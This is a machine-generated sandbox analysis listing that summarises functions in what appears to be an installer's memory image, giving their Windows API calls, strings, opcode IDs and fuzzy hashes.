                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                      • API String ID: 107509674-3733053543
                                                                                                                                                                      • Opcode ID: 8e598905445d78ed6af5eecb89e90879e3bc042baa4d29a228ebf4cb551624fa
                                                                                                                                                                      • Instruction ID: a3beb9442be635481dc24a528bf80296f5a6403aa298a4e6fe1161b8e304ba10
                                                                                                                                                                      • Opcode Fuzzy Hash: 8e598905445d78ed6af5eecb89e90879e3bc042baa4d29a228ebf4cb551624fa
                                                                                                                                                                      • Instruction Fuzzy Hash: 46F09C70294B46B5E610A6758C17F3B71889B44759F94483AFE05EE1C3EBBCD90C4A3E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004975B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC,?,?,00000000,0049B628), ref: 00497607
                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049768A
                                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000), ref: 004976A2
                                                                                                                                                                      • FindClose.KERNEL32(000000FF,004976CD,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC), ref: 004976C0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileFind$AttributesCloseFirstNext
                                                                                                                                                                      • String ID: isRS-$isRS-???.tmp
                                                                                                                                                                      • API String ID: 134685335-3422211394
                                                                                                                                                                      • Opcode ID: 2bf48d152386c700787dc7621cfbfb72c2e77223db3802d45921f404053a1d3c
                                                                                                                                                                      • Instruction ID: ac0d863a46ff1cebd9ad17e119327f8a53363d7c8f83829e6742a95b9ddb5555
                                                                                                                                                                      • Opcode Fuzzy Hash: 2bf48d152386c700787dc7621cfbfb72c2e77223db3802d45921f404053a1d3c
                                                                                                                                                                      • Instruction Fuzzy Hash: 61317471914608ABCF10EF65CC41ADEBBBCDB45714F5184FBA908E32A1DB389E458F58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004573B4 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241windownativeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457431
                                                                                                                                                                      • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457458
                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00457469
                                                                                                                                                                      • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457741,?,00000000,0045777D), ref: 0045772C
                                                                                                                                                                      Strings
                                                                                                                                                                      • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575AC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                                                                                      • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                                                                                                      • API String ID: 2236967946-3182603685
                                                                                                                                                                      • Opcode ID: 0abf119acfdc8bfec0c13d73a5b9c494abce9aece577ed472d97d7f4000498ee
                                                                                                                                                                      • Instruction ID: ea769b4c14fff8c8931e63d970561434c834200915b3ece1ca1c477b8b524b3f
                                                                                                                                                                      • Opcode Fuzzy Hash: 0abf119acfdc8bfec0c13d73a5b9c494abce9aece577ed472d97d7f4000498ee
                                                                                                                                                                      • Instruction Fuzzy Hash: A591E234608204EFD715CF55E9A1F5ABBF9FB49704F2180BAE80497792C638AE05DF58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00455DE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F1F), ref: 00455E10
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E16
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                      • API String ID: 1646373207-3712701948
                                                                                                                                                                      • Opcode ID: adb4104f5709c80258bb97c11b26cfc59244c8afbc61b207ee1c2db355873407
                                                                                                                                                                      • Instruction ID: 94d637f012244594286cd058a6e690650624bbac00cb131118490790a059a9ff
                                                                                                                                                                      • Opcode Fuzzy Hash: adb4104f5709c80258bb97c11b26cfc59244c8afbc61b207ee1c2db355873407
                                                                                                                                                                      • Instruction Fuzzy Hash: F6416271A04649ABCF01EFA5C892DEEB7B8EF48304F504566E800F7292D6785E09CB68
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00474D70 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474DC9
                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EA6
                                                                                                                                                                      • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474EDA,?,?,0049C1D0,00000000), ref: 00474EB4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                                                      • String ID: unins$unins???.*
                                                                                                                                                                      • API String ID: 3541575487-1009660736
                                                                                                                                                                      • Opcode ID: bc76d281d9d61f5ff7b91087824cba7d229e25b6fe9976ca80c221095aaa0cac
                                                                                                                                                                      • Instruction ID: 3bd68598c0aa53c456c144f1316f7d147ab415eaa7c6a73ce12ee5554087e81d
                                                                                                                                                                      • Opcode Fuzzy Hash: bc76d281d9d61f5ff7b91087824cba7d229e25b6fe9976ca80c221095aaa0cac
                                                                                                                                                                      • Instruction Fuzzy Hash: 99316370600118AFCB10EF65C881AEEB7A9EF85314F5084F6E50CA73A2DB389F418F19
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00417CC8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsIconic.USER32(?), ref: 00417D07
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                                                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                                                                                                                                      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Placement$Iconic
                                                                                                                                                                      • String ID: ,
                                                                                                                                                                      • API String ID: 568898626-3772416878
                                                                                                                                                                      • Opcode ID: e47ccc7c96dd650ee5aa99fe86ba7015ba4d078f2208ea4d0e2f2c43afaedfea
                                                                                                                                                                      • Instruction ID: 4a262c2e3c05075ab76cb34d6dc8316acc681754e7f1d5d7fcc9d539da6ecccc
                                                                                                                                                                      • Opcode Fuzzy Hash: e47ccc7c96dd650ee5aa99fe86ba7015ba4d078f2208ea4d0e2f2c43afaedfea
                                                                                                                                                                      • Instruction Fuzzy Hash: A9213E716002089BDF10EFA9D8C0ADA77B8AF58314F15416AFE19DF246D638ED44CBA8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00463B04 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,00463CC1), ref: 00463B35
                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463BC4
                                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C56
                                                                                                                                                                      • FindClose.KERNEL32(000000FF,00463C7D,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C70
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4011626565-0
                                                                                                                                                                      • Opcode ID: 031f0c1b27cf793a7a089b9e50c26c6fb0040ee08aa579bdf87a6018f17403d1
                                                                                                                                                                      • Instruction ID: 72b898f2585741bb0186620e4596b31eb4d76daf54761f31677757d41602065f
                                                                                                                                                                      • Opcode Fuzzy Hash: 031f0c1b27cf793a7a089b9e50c26c6fb0040ee08aa579bdf87a6018f17403d1
                                                                                                                                                                      • Instruction Fuzzy Hash: E941B971A00A54AFCB10EF65CC55ADEB7B8EB88705F4044BAF404B7381E67C9F488E19
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00463F80 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001,00000000,00464167), ref: 00463FF5
                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046403B
                                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 004640F0
                                                                                                                                                                      • FindClose.KERNEL32(000000FF,0046411B,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046410E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4011626565-0
                                                                                                                                                                      • Opcode ID: 937bf673b707d05bba0c4d519a7351b2628f655b07a211b3e42cab03e12c09f2
                                                                                                                                                                      • Instruction ID: c50a8f924641f435bcadfb0116f3895028b18db14577d5a571763064cbfe8c6c
                                                                                                                                                                      • Opcode Fuzzy Hash: 937bf673b707d05bba0c4d519a7351b2628f655b07a211b3e42cab03e12c09f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 77417674A00A18DFCB11EFA5CD859DEB7B8FB88315F4044AAF804A7341E7789E858E59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00482EF8 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsIconic.USER32(?), ref: 00482F36
                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00482F54
                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F76
                                                                                                                                                                      • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F8A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Show$IconicLong
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2754861897-0
                                                                                                                                                                      • Opcode ID: 9bd873c9f0220d19758c381c5bb4dd0340ed2cd746ce77723441eba7bf105e49
                                                                                                                                                                      • Instruction ID: 41c7b109e84caadfbd7bdb59434551f42a7ac603c048c530ac1057f10a9e5501
                                                                                                                                                                      • Opcode Fuzzy Hash: 9bd873c9f0220d19758c381c5bb4dd0340ed2cd746ce77723441eba7bf105e49
                                                                                                                                                                      • Instruction Fuzzy Hash: F30152742452009FD600F7A58E89B6B33E55B14304F480977BB009F2E6CAADD841E71C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00462578 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,0046264C), ref: 004625D0
                                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0046262C,?,00000000,?,00000000,0046264C), ref: 0046260C
                                                                                                                                                                      • FindClose.KERNEL32(000000FF,00462633,0046262C,?,00000000,?,00000000,0046264C), ref: 00462626
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                                                      • Opcode ID: 869680c12ebd58a9a4a6c449fc7b22a0a09b095fd1ddfc7224a0ef3486fbe085
                                                                                                                                                                      • Instruction ID: 35f3f22b183c5d1ecd4ea1753066c09f008546f1eb4ef8afe9bdb694ca888e99
                                                                                                                                                                      • Opcode Fuzzy Hash: 869680c12ebd58a9a4a6c449fc7b22a0a09b095fd1ddfc7224a0ef3486fbe085
                                                                                                                                                                      • Instruction Fuzzy Hash: 07210B31904B047ECB11EB75CC41ACEBBBCDB49304F5084F7A808E21A1E6789E55CE5A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004241D4 Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsIconic.USER32(?), ref: 004241DC
                                                                                                                                                                      • SetActiveWindow.USER32(?,?,?,0046CB73), ref: 004241E9
                                                                                                                                                                        • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                                                                                                                                        • Part of subcall function 00423B0C: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,022E25AC,00424202,?,?,?,0046CB73), ref: 00423B47
                                                                                                                                                                      • SetFocus.USER32(00000000,?,?,?,0046CB73), ref: 00424216
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ActiveFocusIconicShow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 649377781-0
                                                                                                                                                                      • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                                                                                                                      • Instruction ID: 7ea1460413e76a83717bea1d3364086182948ca7ce33fd4e030d283203b7bb74
                                                                                                                                                                      • Opcode Fuzzy Hash: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                                                                                                                      • Instruction Fuzzy Hash: 5BF03071B0012087CB10AFAA9885B9673B8AB48305F5500BBBD05DF357C67CDC058768
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00417CC6 Relevance: 3.0, APIs: 2, Instructions: 49windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsIconic.USER32(?), ref: 00417D07
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                                                                                                                                      • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                                                                                                                                      • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Placement$Iconic
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 568898626-0
                                                                                                                                                                      • Opcode ID: 47b671fdedc35fdf98b71b51c82caa7697cc0af64fcddd8af6052c4a4d8e86ab
                                                                                                                                                                      • Instruction ID: 3daf342c44424aa5ce1366acdd2a80e82e5cfeaf10da0033b5167ac39e8fb95c
                                                                                                                                                                      • Opcode Fuzzy Hash: 47b671fdedc35fdf98b71b51c82caa7697cc0af64fcddd8af6052c4a4d8e86ab
                                                                                                                                                                      • Instruction Fuzzy Hash: BE017C31204108ABDB10EE69ECC1EE773A8AF59324F154166FE09CF242D638EC8087A8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00452A34 Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A71
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,00452A97,?,?,-00000001,00000000), ref: 00452A79
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
